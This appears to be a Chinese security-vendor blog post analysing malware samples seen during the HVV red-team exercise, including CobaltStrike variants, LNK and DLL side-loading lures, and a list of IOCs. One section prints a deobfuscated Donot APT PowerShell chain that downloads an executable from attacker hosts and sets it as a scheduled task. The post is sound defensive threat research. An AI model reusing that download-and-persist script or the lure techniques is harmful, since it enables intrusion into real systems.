【天穹】HVV专题：典型HVV样本总结与IOC收集（第二期）

一、概述

转眼间，HVV行动已经进行两周了，奇安信天穹沙箱持续为用户提供数据安全保障。本期就分析人员对近两周用户提交HVV样本的分析总结，与大家一起分享我们的新发现：

1、样本中出现了使用Geacon项目编译的变种CobaltStrike木马，Geacon是一个旨在使用Go实现CobaltStrike Beacon的开源项目，除了Geacon外，还诞生了改进版的Geacon_Plus和Geacon_Pro；

2、白加黑样本数量显著上升，压缩包样本尤其喜欢利用该技术；

3、在7月20日到8月1日期间，天穹沙箱总计提取到1900+条CobaltStrike Beacon/Stager威胁配置信息，进一步证明CobaltStrike在HVV样本中占比依旧偏重；

4、使用Go和Rust编写的样本数量明显增多，部分样本使用garble和go-strip对Go样本混淆，极大地增加了人工分析难度。

除分析典型样本外，我们还在文末附上了一批高价值HVV样本IOC福利，欢迎大家查阅。

天穹沙箱温馨提示： 如果收到可疑文件或链接，可先投递到天穹沙箱进行分析，避免直接点击造成安全危害。在使用过程中发现任何问题，欢迎随时向我们反馈。

二、典型样本分析

1、漏洞利用

• 样本名：Re_ Compr_Comprobante de pago.xlam

• SHA1：95b33d7f3636a4dcd1ffab18473ab1ee133130fa

• 文件类型：XLAM

• 漏洞信息：CVE-2017-11882

• C2：

  http[:]//192.3.101.141/newconstraints.vbs

• 报告链接：天穹沙箱分析报告

• 描述：CVE-2017-11882是一个经典的栈溢出漏洞，成因是公式编辑器EQNEDT32.EXE读入包含MathType的OLE数据，在拷贝公式字体名称时没有对名称长度进行校验，从而造成栈缓冲区溢出。尽管历史悠久，该漏洞仍被广泛利用，如果使用的Office版本较低，仍可能中招。

2、变种CobaltStrike

• 样本名：***简历.exe

• SHA1：6cb9bc9465a77db724f3eadfb8eff9e5267aa56a

• 文件类型：EXE

• 样本家族：Geacon

• C2：

  101.36.112.140[:]9001

• 报告链接：天穹沙箱分析报告

• 描述：使用Geacon框架编译的变种Beacon木马在之前的HVV行动中也有红队使用，该项目使用Go语言编写，支持跨平台编译，可生成在Windows、Linux、macOS等多个平台上运行的可执行文件。天穹沙箱已针对Geacon及其变种适配提取关键数据能力，可提取威胁配置信息。

• 威胁配置信息：

图1 Geacon威胁配置信息

3、压缩包

3.1 样本一

• 样本名： **金融业务部招聘**_福利.zip

• SHA1： 9710c889f9a2ae172d9120db816124f8b75106f6

• 文件类型：ZIP

• 样本家族：CobaltStrike

• C2：

  【真实C2】
  https[:]//58.215.157.242/v4/static/v1.7.9/gcaptcha4.js
  https[:]//58.220.82.214/v4/static/v1.7.9/gcaptcha4.js
  https[:]//58.222.47.208/v4/static/v1.7.9/gcaptcha4.js
  https[:]//58.215.155.223/v4/static/v1.7.9/gcaptcha4.js
  https[:]//58.222.47.210/v4/static/v1.7.9/gcaptcha4.js
  https[:]//220.185.164.225/v4/static/v1.7.9/gcaptcha4.js
  
  【HOST伪装】
  https[:]//vangogh.bytedance.com/v4/static/v1.7.9/gcaptcha4.js
  https[:]//passport.bytedance.com/v4/static/v1.7.9/gcaptcha4.js
  https[:]//learning.bytedance.com/v4/static/v1.7.9/gcaptcha4.js
  https[:]//news.163.com/v4/static/v1.7.9/gcaptcha4.js
  https[:]//staos.microsoft.com/v4/static/v1.7.9/gcaptcha4.js

• 报告链接：天穹沙箱分析报告

• 描述：该样本是一个典型的HVV压缩包样本，利用了多种手段诱骗用户点击：

  • 压缩包命名为某大型互联网公司的招聘福利，诱骗用户解压；
  • 压缩包内包含两个LNK文件，后缀名为.docx.lnk，图标指向文档，在Windows资源管理器中，.lnk后缀默认不显示，很容易误导用户这是一个docx文档；
  • 当用户双击任意一个LNK文件后，就会运行隐藏在嵌套目录__MACOS__下的a*****a.com文件，该文件实际是一个x64 exe文件，在Windows下.com后缀可以直接执行，同时该文件又是一个有合法签名的白文件，但未做DLL签名校验，因此它加载的PROPSYS.dll可以被劫持，这是一个典型的DLL侧加载；
  • a*****a.com运行后会加载同级目录的PROPSYS.dll，该DLL会加载Shellcode，完成CobaltStrike上线。

• 威胁配置信息（仅提取到伪装后的Host）：

图2 CobaltStrike威胁配置信息

3.2 样本二

• 样本名：APP实名报错录像.zip

• SHA1：c174e2ba90ed5ffa69558702f1872bdfd7929e52

• 文件类型：ZIP

• 样本家族：CobaltStrike

• C2：

  https[:]//47.103.87.12/ptj

• 报告链接：天穹沙箱分析报告

• 描述：该样本与上文提到的样本攻击手法几乎完全一致，同样是利用了LNK、DLL侧加载和__MACOS__目录隐藏可执行文件等手段完成CobaltStrike上线，大概率是同一作者制作。样本分析过程中，我们发现作者在制作LNK文件时出现了疏漏，忘记抹去机器标识符等信息，所以可以通过这些信息溯源：

APP实名报错录像截图.pdf.lnk机器码等信息：

机器标识符: laptop-vtvll06r
机器标识符（原始数据）: 6c 61 70 74 6f 70 2d 76 74 76 6c 6c 30 36 72 00
Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Droid File Identifier: B5571CDB-0C35-11EF-8540-DA77BD3D2A17
Birth Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Birth File Volume Identifier: B5571CDB-0C35-11EF-8540-DA77BD3D2A17

**金融业务部招聘**_福利.docx.lnk机器码等信息：

机器标识符: laptop-6n6urief
机器标识符（原始数据）: 6c 61 70 74 6f 70 2d 36 6e 36 75 72 69 65 66 00
Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Droid File Identifier: 96E48F4F-49BA-11EF-8539-AC74B114B9FE
Birth Droid Volume Identifier: 0878038E-185F-4051-8202-5C6E4A306D3C
Birth File Volume Identifier: 96E48F4F-49BA-11EF-8539-AC74B114B9FE

两个LNK的机器码均以laptop-开头，且Droid Volume Identifier字段相同，考虑到攻击方式如此接近，推测是同一攻击者制作。

• 威胁配置信息：

图3 CobaltStrike威胁配置信息

4、恶意快捷方式

4.1 样本一

• 样本名：Screenshot_29_07_2024_11_02_03.lnk

• SHA1：76a9126abf1a740f121ec01698b5749bdde8b2bc

• 文件类型：LNK

• C2：

  45.61.139.69[:]80

• 报告链接：天穹沙箱分析报告

• 描述：该样本通过cmd执行恶意命令后释放了一个名为ie4uinit.exe的恶意可执行文件，然后执行该恶意文件连接C2以执行更多恶意行为。

4.2 样本二

• 样本名：*****_Technology_Innovation.lnk

• SHA1：00faa7a56f512ff8bfad1b5fafa74ee02c771b58

• 文件类型：LNK

• C2：

  xingyu.ghshijie.com
  yuxuan.ghshijie.com
  https[:]//xingyu.ghshijie.com/cvbcolo09/tqerwer8
  https[:]//yuxuan.ghshijie.com/jlytw07sev/fuol91mv

• 报告链接：天穹沙箱分析报告

• 描述：该样本实际是肚脑虫（Donot）APT组织在HVV期间投递的恶意快捷方式，通过LNK命令行参数执行恶意PS1命令，使用TQGPT对PS1命令解混淆后结果如下：

  # 设置下载文件时不显示进度条
  $ProgressPreference = 'SilentlyContinue';
  
  # 从指定URL下载PDF文件到C:\Users\Public目录下
  Invoke-WebRequest https://xingyu.ghshijie.com/cvbcolo09/tqerwer8 -OutFile 'C:\Users\Public\*****_Technology_Innovation.pdf';
  
  # 打开下载的PDF文件
  Start-Process 'C:\Users\Public\*****_Technology_Innovation.pdf';
  
  # 从另一个URL下载一个文件到C:\Users\Public目录下，文件名为sam
  Invoke-WebRequest https://Yuxuan.ghshijie.com/jlytw07sev/fuol91mv -OutFile 'C:\Users\Public\sam';
  
  # 将下载的文件重命名为Update.exe
  Rename-Item -Path 'C:\Users\Public\sam' -NewName 'C:\Users\Public\Update.exe';
  
  # 复制PDF文件到当前目录
  Copy-Item 'C:\Users\Public\*****_Technology_Innovation.pdf' -Destination .;
  
  # 创建一个名为TaskReportingUpdate的计划任务，该任务每分钟运行一次Update.exe
  schtasks /Create /SC MINUTE /TN TaskReportingUpdate /TR "C:\Users\Public\Update";
  
  # 尝试删除所有名称以.f.n结尾的文件，但这里使用的通配符格式是非标准的，可能不起作用
  Remove-Item *.?f.?n?

  由解混淆后的命令可以看出，该样本会下载一个PDF并打开该文件，随后下载一个EXE文件，并将EXE设置为计划任务，每分钟运行一次，然后清除痕迹。许多APT组织会在HVV期间浑水摸鱼，提醒各位一定不要掉以轻心，谨防造成不可挽回的损失。

三、IOC福利

除了以上典型样本外，我们还为各位读者附上一批高价值HVV样本IOC名单：

样本名	Drv64.exe
MD5	ed248b880f0a90736365f80e07af828e
C2	https[:]//1o88.oss-cn-hangzhou.aliyuncs.com/i.dat
样本名	setup附件6029-1.exe
MD5	ad3df703fe84be085ff6662fe989c6b7
C2	https[:]//baidu77-1326101028.cos.ap-hongkong.myqcloud.com/77.png
样本名	1.exe
MD5	c8564d787012f97a20fd723ac283a59d
C2	https[:]//39.104.205.159/api/v1/teams/spring-framework/pipelines
样本名	SpSc_se.exe
MD5	347ee0d5dee22382bf2020de538ad2a4
C2	http[:]//192.168.47.128/MjYM
样本名	模板规格明细.exe
MD5	655fee4f7f402eeedae08ca6f6545a51
C2	https[:]//wwwasdasdqfweqwe45-1326536100.cos.ap-chongqing.myqcloud.com/45.txt
样本名	票**********助手.exe
MD5	613e87babd878e561f89d679f351a3f1
C2	https[:]//fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1721279610811/xuan.txt
样本名	apache.exe
MD5	474f55685d62720ee40f0810dff59c09
C2	https[:]//apibaidu-cjklerlcfx.cn-hangzhou.fcapp.run/jquery-3.3.10.min.js
样本名	个人微信(2).exe
MD5	359879c68712574651f14279ef3834cf
C2	https[:]//107.172.191.175/uTAS
样本名	Viz_Setup.U3.11.exe
MD5	b5fe2fcc7efc4b39d646a21da22f6593
C2	https[:]//o30.oss-cn-beijing.aliyuncs.com/i.dat
样本名	SynTPLpr.exe
MD5	873d734941f7b6128755dce770e3752b
C2	https[:]//42o.oss-cn-beijing.aliyuncs.com/i.dat
样本名	wlanext.exe
MD5	c0783e30a0667375bbdc32f34698fea9
C2	21hjgt71f.sharedomain.top
样本名	9999.exe
MD5	6b31a365aa150ee29240045044ddb92c
C2	https[:]//82.157.177.73/wp08/wp-includes/dtcla.php
样本名	****行情交易系统.exe
MD5	cb49d2813b0cb4f78fc39152baf58d4f
C2	https[:]//wpurl.wpqh.cc/fzxdy/trade_pobo.txt
样本名	02-升级工具.exe
MD5	c858596ac28b6c281cc6a5fd3e797928
C2	xred.mooo.com
样本名	****采购平台数字签名服务补丁升级包安装说明.exe
MD5	0950d8bba59da75d88bf5a77d4f2fd82
C2	https[:]//62.234.31.47/center/user_sid
样本名	****有限公司2024年Q1****大屏业务攻坚活动执行服务后续问题反馈.exe
MD5	fc6aea2d4740c5217eace9b4236d3b4f
C2	https[:]//152.136.166.138/HfJ989Sh
样本名	**-****大学-本科-机械专业-个人简历及其他材料.exe
MD5	c38e7ecc2313c104aa11cb312687bed9
C2	175.178.3.223[:]80
样本名	点击查看.exe
MD5	1d6f066b28830b3bc2d83056ead4da14
C2	https[:]//omss.oss-cn-hangzhou.aliyuncs.com/f.dat
样本名	Setup-2024.exe
MD5	fa22cb60e3ac3ec4495722966e222123
C2	154.91.64.9[:]8080
样本名	GPU环境检测10.01.07.exe
MD5	6f6f5d55e407ca4ce7930dfa270f23c5
C2	2024oe.uf1o.com
样本名	公司6月工资清单&c.exe
MD5	055d43e0c8195c2b47a3e898ffc653c1
C2	https[:]//jerryojbksaaaaaa.oss-cn-beijing.aliyuncs.com/c.txt
样本名	vcredist2008_x64.exe
MD5	a8aad42c597878cf18e5b8ad342c8429
C2	xred.mooo.com
样本名	******小额贷款方案汇总文档(1)2.exe
MD5	26f47e1c677927db673dd2892739a9c3
C2	https[:]//124.225.127.200/static/vendor.5398c8aa.js
样本名	hosts.1.x64.exe
MD5	b0a4afbf62c6313549d7487200eb7ee3
C2	https[:]//www.cainiao.com/mp/getapp/msgext
样本名	****护网蓝队简历.exe
MD5	37879819a198524c6922699063599fef
C2	http[:]//1.92.121.46/match
样本名	举报材料.docx.exe
MD5	75d8097b47bfa9e021c71b4a34f80b91
C2	101.42.6.230[:]8085
样本名	****专利（**）涉嫌侵权通告文件.exe
MD5	81154dffd744704da6a06c9aece03123
C2	https[:]//39.104.16.206/dist/css/bootstrap.min.css
样本名	SASAC-中央企业科技创新成果产品手册（2024年版）文档已加密-2024073109389.zip
MD5	94cbd01a9ad1fc0d0c8bc5eb9af7ed87
C2	https[:]//www.512ks.cn/Discord.1.2.js https[:]//www.dnf404.com/Discord.1.2.js https[:]//www.333.cc/Discord.1.2.js https[:]//www.sdzy.com/Discord.1.2.js https[:]//www.68y.com/Discord.1.2.js https[:]//61.170.88.203/Discord.1.2.js https[:]//116.136.171.154/Discord.1.2.js https[:]//111.123.250.73/Discord.1.2.js
样本名	Game_Cloner.exe
MD5	c2b7718e40578cfb1b0fbd1ce4825840
C2	https[:]//github.com/lcm2080/sssssttoooorrre22/raw/main/BUILT%20(2).exe
样本名	****（柬埔寨）暑期999全家游.iso
MD5	4b71072368246193c9b2f2a7f101b6ff
C2	123.56.128.253[:]80

四、技术支持与反馈

星图实验室深耕沙箱分析技术多年，致力于让沙箱更好用、更智能。做地表最强的动态分析沙箱，为每个样本分析人员提供便捷易用的分析工具，始终是我们最求的目标。各位同学在使用过程中有任何问题，欢迎联系我们。

---

天穹沙箱支持模拟14种CPU架构的虚拟机，环境数量50+，全面覆盖PC、服务器、智能终端、IoT设备的主流设备架构形态。在宿主机方面，除了Intel/AMD的x86架构CPU和CentOS操作系统之外，天穹沙箱支持海光、飞腾、鲲鹏等x86、ARM架构国产CPU和银河麒麟、中科方德等信创操作系统。

天穹沙箱系统以云沙箱、引擎输出、数据接口等多种形式服务于公司各个业务部门，包括天眼、终端安全、态势感知、ICG、锡安平台、安服等。

天穹内网地址（使用域账号登录）：https://sandbox.qianxin-inc.cn
天穹公网地址（联系我们申请账号）：https://sandbox.qianxin.com